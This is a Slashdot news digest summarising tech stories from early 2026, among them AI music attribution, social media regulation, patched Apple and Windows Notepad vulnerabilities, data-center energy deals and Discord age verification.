Sony

Sony Tech Can Identify Original Music in AI-Generated Songs (nikkei.com) 40

Sony Group has developed a technology that can identify the underlying music used in tunes generated by AI, making it possible for songwriters to seek compensation from AI developers if their music was used. From a report: Sony Group's technology analyzes which musicians' songs were used in learning and generating music. It can quantify the contribution of each original work, such as "30% of the music used by the Beatles and 10% by Queen," for example.

If the AI developer agrees to cooperate for the analysis, Sony Group will obtain data by connecting to the developer's base model system. When cooperation is not attainable, the technology estimates the original work by comparing AI-generated music with existing music. The AI boom has sparked numerous cases in which AI developers are accused of using copyrighted music, video and writing without permission to train machines. In the music industry, AI-generated songs using the voices of well-known singers have been distributed online. The Japanese company thinks the technology will help create a system that distributes revenue generated by AI music to original songwriters based on their contribution.

EU

EU Parliament Blocks AI Features Over Cyber, Privacy Fears (politico.eu) 47

An anonymous reader shares a report: The European Parliament has disabled AI features on the work devices of lawmakers and their staff over cybersecurity and data protection concerns, according to an internal email seen by POLITICO. The chamber emailed its members on Monday to say it had disabled "built-in artificial intelligence features" on corporate tablets after its IT department assessed it couldn't guarantee the security of the tools' data.

"Some of these features use cloud services to carry out tasks that could be handled locally, sending data off the device," the Parliament's e-MEP tech support desk said in the email. "As these features continue to evolve and become available on more devices, the full extent of data shared with service providers is still being assessed. Until this is fully clarified, it is considered safer to keep such features disabled."

Social Networks

Instagram Boss Says 16 Hours of Daily Use Is Not Addiction (bbc.com) 62

Instagram head Adam Mosseri told a Los Angeles courtroom last week that a teenager's 16-hour single-day session on the platform was "problematic use" but not an addiction, a distinction he drew repeatedly during testimony in a landmark trial over social media's harm to minors.

Mosseri, who has led Instagram for eight years, is the first high-profile tech executive to take the stand. He agreed the platform should do everything in its power to protect young users but said how much use was too much was "a personal thing." The lead plaintiff, identified as K.G.M., reported bullying on Instagram more than 300 times; Mosseri said he had not known. An internal Meta survey of 269,000 users found 60% had experienced bullying in the previous week.
Linux

'I Tried Running Linux On an Apple Silicon Mac and Regretted It' (msn.com) 157

Installing Linux on a MacBook Air "turned out to be a very underwhelming experience," according to the tech news site MakeUseOf: The thing about Apple silicon Macs is that it's not as simple as downloading an AArch64 ISO of your favorite distro and installing it. Yes, the M-series chips are ARM-based, but that doesn't automatically make the whole system compatible in the same way most traditional x86 PCs are. Pretty much everything in modern MacBooks is custom. The boot process isn't standard UEFI like on most PCs. Apple has its own boot chain called iBoot. The same goes for other things, like the GPU, power management, USB controllers, and pretty much every other hardware component. It is as proprietary as it gets.

This is exactly what the team behind Asahi Linux has been working toward. Their entire goal has been to make Linux properly usable on M-series Macs by building the missing pieces from the ground up. I first tried it back in 2023, when the project was still tied to Arch Linux and decided to give it a try again in 2026. These days, though, the main release is called Fedora Asahi Remix, which, as the name suggests, is built on Fedora rather than Arch...

For Linux on Apple Silicon, the article lists three major disappointments:
  • "External monitors don't work unless your MacBook has a built-in HDMI port."
  • "Linux just doesn't feel fully ready for ARM yet. A lot of applications still aren't compiled for ARM, so software support ends up being very hit or miss." (And even most of the apps tested with FEX "either didn't run properly or weren't stable enough to rely on.")
  • Asahi "refused to connect to my phone's hotspot," they write (adding "No, it wasn't an iPhone").

AI

Will Tech Giants Just Use AI Interactions to Create More Effective Ads? (seattletimes.com) 59

Google never asked its users before adding AI Overviews to its search results and AI-generated email summaries to Gmail, notes the New York Times. And Meta didn't ask before making "Meta AI" an unremovable part of its tool in Instagram, WhatsApp and Messenger.

"The insistence on AI everywhere — with little or no option to turn it off — raises an important question about what's in it for the internet companies..." Behind the scenes, the companies are laying the groundwork for a digital advertising economy that could drive the future of the internet. The underlying technology that enables chatbots to write essays and generate pictures for consumers is being used by advertisers to find people to target and automatically tailor ads and discounts to them....

Last month, OpenAI said it would begin showing ads in the free version of ChatGPT based on what people were asking the chatbot and what they had looked for in the past. In response, a Google executive mocked OpenAI, adding that Google had no plans to show ads inside its Gemini chatbot. What he didn't mention, however, was that Google, whose profits are largely derived from online ads, shows advertising on Google.com based on user interactions with the AI chatbot built into its search engine.

For the past six years, as regulators have cracked down on data privacy, the tech giants and online ad industry have moved away from tracking people's activities across mobile apps and websites to determine what ads to show them. Companies including Meta and Google had to come up with methods to target people with relevant ads without sharing users' personal data with third-party marketers. When ChatGPT and other AI chatbots emerged about four years ago, the companies saw an opportunity: The conversational interface of a chatty companion encouraged users to voluntarily share data about themselves, such as their hobbies, health conditions and products they were shopping for.

The strategy already appears to be working. Web search queries are up industrywide, including for Google and Bing, which have been incorporating AI chatbots into their search tools. That's in large part because people prod chatbot-powered search engines with more questions and follow-up requests, revealing their intentions and interests much more explicitly than when they typed a few keywords for a traditional internet search.

Social Networks

India's New Social Media Rules: Remove Unlawful Content in Three Hours, Detect Illegal AI Content Automatically (bbc.com) 23

Bloomberg reports: India tightened rules governing social media content and platforms, particularly targeting artificially generated and manipulated material, in a bid to crack down on the rapid spread of misinformation and deepfakes. The government on Tuesday (Feb 10) notified new rules under an existing law requiring social media firms to comply with takedown requests from Indian authorities within three hours and prominently label AI-generated content. The rules also require platforms to put in place measures to prevent users from posting unlawful material...

Companies will need to invest in 24-hour monitoring centres as enforcement shifts toward platforms rather than users, said Nikhil Pahwa, founder of MediaNama, a publication tracking India's digital policy... The onus of identification, removal and enforcement falls on tech firms, which could lose immunity from legal action if they fail to act within the prescribed timeline.

The new rules also require automated tools to detect and prevent illegal AI content, the BBC reports. And they add that India's new three-hour deadline is "a sharp tightening of the existing 36-hour deadline." [C]ritics worry the move is part of a broader tightening of oversight of online content and could lead to censorship in the world's largest democracy with more than a billion internet users... According to transparency reports, more than 28,000 URLs or web links were blocked in 2024 following government requests...

Delhi-based technology analyst Prasanto K Roy described the new regime as "perhaps the most extreme takedown regime in any democracy". He said compliance would be "nearly impossible" without extensive automation and minimal human oversight, adding that the tight timeframe left little room for platforms to assess whether a request was legally appropriate. On AI labelling, Roy said the intention was positive but cautioned that reliable and tamper-proof labelling technologies were still developing.

DW reports that India has also "joined the growing list of countries considering a social media ban for children under 16."

"Young Indians are not happy and are already plotting workarounds."
Desktops (Apple)

Apple Patches Decade-Old IOS Zero-Day, Possibly Exploited By Commercial Spyware (securityweek.com) 11

This week Apple patched iOS and macOS against what it called "an extremely sophisticated attack against specific targeted individuals."

Security Week reports that the bugs "could be exploited for information exposure, denial-of-service (DoS), arbitrary file write, privilege escalation, network traffic interception, sandbox escape, and code execution." Tracked as CVE-2026-20700, the zero-day flaw is described as a memory corruption issue that could be exploited for arbitrary code execution... The tech giant also noted that the flaw's exploitation is linked to attacks involving CVE-2025-14174 and CVE-2025-43529, two zero-days patched in WebKit in December 2025...

The three zero-day bugs were identified by Apple's security team and Google's Threat Analysis Group and their descriptions suggest that they might have been exploited by commercial spyware vendors... Additional information is available on Apple's security updates page.

Brian Milbier, deputy CISO at Huntress, tells the Register that the dyld/WebKit patch "closes a door that has been unlocked for over a decade."

Thanks to Slashdot reader wiredmikey for sharing the article.
Social Networks

Social Networks Agree to Be Rated On Their Teen Safety Efforts (yahoo.com) 14

Meta, TikTok, Snap and other social neteworks agreed this week to be rated on their teen safety efforts, reports the Los Angeles Times, "amid rising concern about whether the world's largest social media platforms are doing enough to protect the mental health of young people." The Mental Health Coalition, a collective of organizations focused on destigmatizing mental health issues, said Tuesday that it is launching standards and a new rating system for online platforms. For the Safe Online Standards (S.O.S.) program, an independent panel of global experts will evaluate companies on parameters including safety rules, design, moderation and mental health resources. TikTok, Snap and Meta — the parent company of Facebook and Instagram — will be the first companies to be graded. Discord, YouTube, Pinterest, Roblox and Twitch have also agreed to participate, the coalition said in a news release.

"These standards provide the public with a meaningful way to evaluate platform protections and hold companies accountable — and we look forward to more tech companies signing up for the assessments," Antigone Davis, vice president and global head of safety at Meta, said in a statement... The ratings will be color-coded, and companies that perform well on the tests will get a blue shield badge that signals they help reduce harmful content on the platform and their rules are clear. Those that fall short will receive a red rating, indicating they're not reliably blocking harmful content or lack proper rules. Ratings in other colors indicate whether the platforms have partial protection or whether their evaluations haven't been completed yet.

EU

Google Warns EU Risks Undermining Own Competitiveness With Tech Sovereignty Push (ft.com) 81

Europe risks undermining its own competitiveness drive by restricting access to foreign technology, Google's president of global affairs and chief legal officer Kent Walker told the Financial Times, as Brussels accelerates efforts to reduce reliance on U.S. tech giants. Walker said the EU faces a "competitive paradox" as it seeks to spur growth while restricting the technologies needed to achieve that goal.

He warned against erecting walls that make it harder to use some of the best technology in the world, especially as it advances quickly. EU leaders gathered Thursday for a summit in Belgium focused on increasing European competitiveness in a more volatile global economy. Europe's digital sovereignty push gained momentum in recent months, driven by fears that President Donald Trump's foreign policy could force a tech decoupling.
Education

Bill Introduced To Replace West Virginia's New CS Course Graduation Requirement With Computer Literacy Proficiency 51

theodp writes: West Virginia lawmakers on Tuesday introduced House Bill 5387 (PDF), which would repeal the state's recently enacted mandatory stand-alone computer science graduation requirement and replace it with a new computer literacy proficiency requirement. Not too surprisingly, the Bill is being opposed by tech-backed nonprofit Code.org, which lobbied for the WV CS graduation requirement (PDF) just last year. Code.org recently pivoted its mission to emphasize the importance of teaching AI education alongside traditional CS, teaming up with tech CEOs and leaders last year to launch a national campaign to mandate CS and AI courses as graduation requirements.

"It would basically turn the standalone computer science course requirement into a computer literacy proficiency requirement that's more focused on digital literacy," lamented Code.org as it discussed the Bill in a Wednesday conference call with members of the Code.org Advocacy Coalition, including reps from Microsoft's Education and Workforce Policy team. "It's mostly motivated by a variety of different issues coming from local superintendents concerned about, you know, teachers thinking that students don't need to learn how to code and other things. So, we are addressing all of those. We are talking with the chair and vice chair of the committee a week from today to try to see if we can nip this in the bud." Concerns were also raised on the call about how widespread the desire for more computing literacy proficiency (over CS) might be, as well as about legislators who are associating AI literacy more with digital literacy than CS.

The proposed move from a narrower CS focus to a broader goal of computer literacy proficiency in WV schools comes just months after the UK's Department for Education announced a similar curriculum pivot to broader digital literacy, abandoning the narrower 'rigorous CS' focus that was adopted more than a decade ago in response to a push by a 'grassroots' coalition that included Google, Microsoft, UK charities, and other organizations.
Microsoft

Windows 11 Notepad Flaw Let Files Execute Silently via Markdown Links (bleepingcomputer.com) 66

Microsoft has patched a high-severity vulnerability in Windows 11's Notepad that allowed attackers to silently execute local or remote programs when a user clicked a specially crafted Markdown link, all without triggering any Windows security warning.

The flaw, tracked as CVE-2026-20841 and fixed in the February 2026 Patch Tuesday update, stemmed from Notepad's relatively new Markdown support -- a feature Microsoft added after discontinuing WordPad and rewriting Notepad to serve as both a plain text and rich text editor. An attacker only needed to create a Markdown file containing file:// links pointing to executables or special URIs like ms-appinstaller://, and a Ctrl+click in Markdown mode would launch them. Microsoft's fix now displays a warning dialog for any link that doesn't use http:// or https://, though the company did not explain why it chose a prompt over blocking non-standard links entirely. Notepad updates automatically through the Microsoft Store.
AI

Anthropic To Cover Costs of Electricity Price Increases From Its Data Centers (nbcnews.com) 37

AI startup Anthropic says it will ensure consumer electricity costs remain steady as it expands its data center footprint. From a report: Anthropic said it would work with utility companies to "estimate and cover" consumer electricity price increases in places where it is not able to sufficiently generate new power and pay for 100% of the infrastructure upgrades required to connect its data centers to the electrical grid.

In a statement to NBC News, Anthropic CEO Dario Amodei said: "building AI responsibly can't stop at the technology -- it has to extend to the infrastructure behind it. We've been clear that the U.S. needs to build AI infrastructure at scale to stay competitive, but the costs of powering our models should fall on Anthropic, not everyday Americans. We look forward to working with communities, local governments, and the Administration to get this right."

Facebook

Meta Auditor EY Raised Red Flag on Data-Center Accounting (wsj.com) 31

Meta Platforms' latest annual report contained an unusual, cautionary note for investors. From a report: The tech giant's auditor, Ernst & Young, raised a red flag over the financial engineering Meta used to keep a $27 billion data-center project off its balance sheet. While EY ultimately blessed Meta's accounting treatment, the firm flagged it as a "critical audit matter." This means it was one of the hardest, riskiest judgments the auditor had to make.

Such a warning label is rare for a specific, high-profile transaction at a major audit client. Meta moved the data-center project, called Hyperion, off its books in October into a new joint venture with Blue Owl Capital. Meta owns 20% of the venture; funds managed by Blue Owl own the other 80%. A holding company called Beignet Investor, which owns the Blue Owl portion, sold a then-record $27.3 billion of bonds to investors. The joint venture is known in accounting parlance as a variable interest entity, or VIE. Meta said it isn't the "primary beneficiary" of this entity and so didn't have to put the venture's assets and liabilities on its own balance sheet.

Meta's assertion that it lacks power over the venture is debatable and has drawn scrutiny from investors and lawmakers. Meta is a hyperscaler and knows how to run data centers for artificial intelligence, while Blue Owl is a financier. Whether the venture succeeds economically will come down to Meta's decisions and know-how. In its report, EY said auditing Meta's decision "was especially challenging due to the significant judgment required in determining the activities that most significantly affect the VIE's economic performance."

Communications

T-Mobile Will Live Translate Regular Phone Calls Without an App (theverge.com) 22

T-Mobile is opening registration today for a beta test of Live Translation, an AI-powered feature that will translate live phone calls into more than 50 languages when it launches this spring.

The feature operates at the network level, so it doesn't require any specific app or device -- beta participants simply dial 87 to activate it on a call. T-Mobile President of Technology and CTO John Saw told The Verge that Live Translation works over VoLTE, VoNR and VoWiFi, meaning it isn't limited to 5G. The only requirement is that a T-Mobile customer must initiate the translation. The beta will be free, though T-Mobile has not said whether the feature will eventually be paywalled.
AI

The First Signs of Burnout Are Coming From the People Who Embrace AI the Most 61

An anonymous reader shares a report: The most seductive narrative in American work culture right now isn't that AI will take your job. It's that AI will save you from it. That's the version the industry has spent the last three years selling to millions of nervous people who are eager to buy it. Yes, some white-collar jobs will disappear. But for most other roles, the argument goes, AI is a force multiplier. You become a more capable, more indispensable lawyer, consultant, writer, coder, financial analyst -- and so on. The tools work for you, you work less hard, everybody wins.

But a new study published in Harvard Business Review follows that premise to its actual conclusion, and what it finds there isn't a productivity revolution. It finds companies are at risk of becoming burnout machines.

As part of what they describe as "in-progress research," UC Berkeley researchers spent eight months inside a 200-person tech company watching what happened when workers genuinely embraced AI. What they found across more than 40 "in-depth" interviews was that nobody was pressured at this company. Nobody was told to hit new targets. People just started doing more because the tools made more feel doable. But because they could do these things, work began bleeding into lunch breaks and late evenings. The employees' to-do lists expanded to fill every hour that AI freed up, and then kept going.
China

ByteDance Suspends Seedance 2 Feature That Turns Facial Photos Into Personal Voices Over Potential Risks (technode.com) 18

hackingbear writes: China's Bytedance has released Seedance 2.0, an AI video generator which handles up to four types of input at once: images, videos, audio, and text. Users can combine up to nine images, three videos, and three audio files, up to a total of twelve files. Generated videos run between 4 and 15 [or 60] seconds long and automatically come with sound effects or music.

Its performance is unfortunately so good that it has forced the firm to block its facial-to-voice feature after the model reportedly demonstrated the ability to generate highly accurate personal voice characteristics using only facial images, even without user authorization.

In a recent test, Pan Tianhong, founder of tech media outlet MediaStorm, discovered that uploading a personal facial photo caused the model to produce audio nearly identical to his real voice -- without using any voice samples or authorized data. [...]

Power

White House Eyes Data Center Agreements Amid Energy Price Spikes (politico.com) 40

An anonymous reader shares a report: The Trump administration wants some of the world's largest technology companies to publicly commit to a new compact governing the rapid expansion of AI data centers, according to two administration officials granted anonymity to discuss private conversations.

A draft of the compact obtained by POLITICO lays out commitments designed to ensure energy-hungry data centers do not raise household electricity prices, strain water supplies or undermine grid reliability, and that the companies driving demand also carry the cost of building new infrastructure.

The proposed pact, which is not final and could be subject to change, is framed as a voluntary agreement between President Donald Trump and major U.S. tech companies and data center developers. It could bind OpenAI, Microsoft, Google, Amazon, Facebook parent Meta and other AI giants to a broad set of energy, water and community principles. None of these companies immediately responded to a request for comment.

Google

Google Lines Up 100-Year Sterling Bond Sale (ft.com) 44

Alphabet has lined up banks to sell a rare 100-year bond, stepping up a borrowing spree by Big Tech companies racing to fund their vast investments in AI this year. From a report: The so-called century bond will form part of a debut sterling issuance this week by Google's parent company, according to people familiar with the matter. Alphabet was also selling $15bn of dollar bonds on Monday and lining up a Swiss franc bond sale, the people said.

Century bonds -- long-term borrowing at its most extreme -- are highly unusual, although a flurry were sold during the period of very low interest rates that followed the financial crisis, including by governments such as Austria and Argentina. The University of Oxford, EDF and the Wellcome Trust -- the most recent in 2018 -- are the only issuers to have previously tapped the sterling century market.

Such sales are even rarer in the tech sector, with most of the industry's biggest groups issuing up to 40 years, although IBM sold a 100-year bond back in 1996. Big Tech companies and their suppliers are expected to invest almost $700bn in AI infrastructure this year and are increasingly turning to the debt markets to finance the giant data centre build-out.
Michael Burry, writing on Substack: Alphabet looking to issue a 100-year bond. Last time this happened in tech was Motorola in 1997, which was the last year Motorola was considered a big deal.

At the start of 1997, Motorola was a top 25 market cap and top 25 revenue corporation in America. Never again. The Motorola corporate brand in 1997 was ranked #1 in the US, ahead of Microsoft. In 1998, Nokia overtook Motorola in cell phones, and after the iPhone it fell out of the consumer eye. Today Motorola is the 232nd largest market cap with only $11 billion in sales.

Privacy

Discord Will Require a Face Scan or ID for Full Access Next Month (theverge.com) 166

Discord said today it's rolling out age verification on its platform globally starting next month, when it will automatically set all users' accounts to a "teen-appropriate" experience unless they demonstrate that they're adults. From a report: Users who aren't verified as adults will not be able to access age-restricted servers and channels, won't be able to speak in Discord's livestream-like "stage" channels, and will see content filters for any content Discord detects as graphic or sensitive. They will also get warning prompts for friend requests from potentially unfamiliar users, and DMs from unfamiliar users will be automatically filtered into a separate inbox.

[...] A government ID might still be required for age verification in its global rollout. According to Discord, to remove the new "teen-by-default" changes and limitations, "users can choose to use facial age estimation or submit a form of identification to [Discord's] vendor partners, with more options coming in the future." The first option uses AI to analyze a user's video selfie, which Discord says never leaves the user's device. If the age group estimate (teen or adult) from the selfie is incorrect, users can appeal it or verify with a photo of an identity document instead. That document will be verified by a third party vendor, but Discord says the images of those documents "are deleted quickly -- in most cases, immediately after age confirmation."

Transportation

Carmakers Rush To Remove Chinese Code Under New US Rules (msn.com) 141

"How Chinese is your car?" asks the Wall Street Journal. "Automakers are racing to work it out." Modern cars are packed with internet-connected widgets, many of them containing Chinese technology. Now, the car industry is scrambling to root out that tech ahead of a looming deadline, a test case for America's ability to decouple from Chinese supply chains. New U.S. rules will soon ban Chinese software in vehicle systems that connect to the cloud, part of an effort to prevent cameras, microphones and GPS tracking in cars from being exploited by foreign adversaries.

The move is "one of the most consequential and complex auto regulations in decades," according to Hilary Cain, head of policy at trade group the Alliance for Automotive Innovation. "It requires a deep examination of supply chains and aggressive compliance timelines."

Carmakers will need to attest to the U.S. government that, as of March 17, core elements of their products don't contain code that was written in China or by a Chinese company. The rule also covers software for advanced autonomous driving and will be extended to connectivity hardware starting in 2029. Connected cars made by Chinese or China-controlled companies are also banned, wherever their software comes from...

The Commerce Department's Bureau of Industry and Security, which introduced the connected-vehicle rule, is also allowing the use of Chinese code that is transferred to a non-Chinese entity before March 17. That carve-out has sparked a rush of corporate restructuring, according to Matt Wyckhouse, chief executive of cybersecurity firm Finite State. Global suppliers are relocating China-based software teams, while Chinese companies are seeking new owners for operations in the West.

Thanks to long-time Slashdot reader schwit1 for sharing the article.

Slashdot Top Deals